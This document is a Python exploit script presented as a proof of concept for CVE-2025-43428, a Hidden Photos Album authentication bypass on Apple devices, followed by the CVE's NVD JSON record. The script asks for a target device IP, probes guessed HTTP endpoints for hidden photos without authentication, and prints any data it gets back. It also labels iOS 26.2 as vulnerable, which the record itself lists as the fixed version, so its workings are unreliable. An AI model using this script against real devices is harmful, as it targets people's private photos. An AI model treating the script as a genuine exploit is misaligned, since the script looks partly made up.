CVE-2025-43428

# CVE-2025-43428 PoC - Hidden Photos Album Unauthorized Access # This PoC demonstrates the authentication bypass in Hidden Photos Album import requests import json def check_cve_43428(): """ Check if target device is vulnerable to CVE-2025-43428 """ target_ip = input("Enter target Apple device IP: ") # Attempt to access Hidden Photos Album without authentication headers = { 'User-Agent': 'PhotoLibrary/1.0', 'X-MMe-Client-Info': 'iOS/26.2', # Vulnerable version } # Method 1: Try to access via local network urls = [ f"http://{target_ip}:8778/v1/photos", f"http://{target_ip}:8778/v1/photos/hidden", f"http://{target_ip}:8778/v1/library/hidden" ] vulnerable = False for url in urls: try: response = requests.get(url, headers=headers, timeout=5) if response.status_code == 200: data = response.json() if 'photos' in data or 'hidden_photos' in data: print(f"[!] VULNERABLE: {url} returned hidden photos without auth!") print(f"[+] Sample data: {json.dumps(data, indent=2)[:500]}") vulnerable = True except requests.exceptions.RequestException: pass return vulnerable def exploit_hidden_album(): """ Exploit CVE-2025-43428 to access hidden photos """ print("=" * 60) print("CVE-2025-43428 Exploitation Tool") print("Hidden Photos Album Authentication Bypass") print("=" * 60) if check_cve_43428(): print("\n[+] Target is VULNERABLE to CVE-2025-43428") print("[+] Attack successful - Hidden photos accessible without authentication") else: print("\n[-] Target may not be vulnerable or not accessible") if __name__ == "__main__": exploit_hidden_album()

{"cve": {"id": "CVE-2025-43428", "sourceIdentifier": "[email protected]", "published": "2025-12-17T21:16:01.990", "lastModified": "2026-04-02T19:20:44.970", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "A configuration issue was addressed with additional restrictions. This issue is fixed in iOS 26.2 and iPadOS 26.2, macOS Tahoe 26.2, visionOS 26.2. Photos in the Hidden Photos Album may be viewed without authentication."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "EA029506-5678-444B-93B5-27DAD643A1C0"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "6276FDCA-3407-4FDD-8437-B57C98A97084"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "FBA92B6D-E36C-432B-A041-94D81427CD75"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.2", "matchCriteriaId": "EB10D901-4800-4DF9-AB35-48017C178161"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125884", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125886", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://support.apple.com/en-us/125891", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}]}}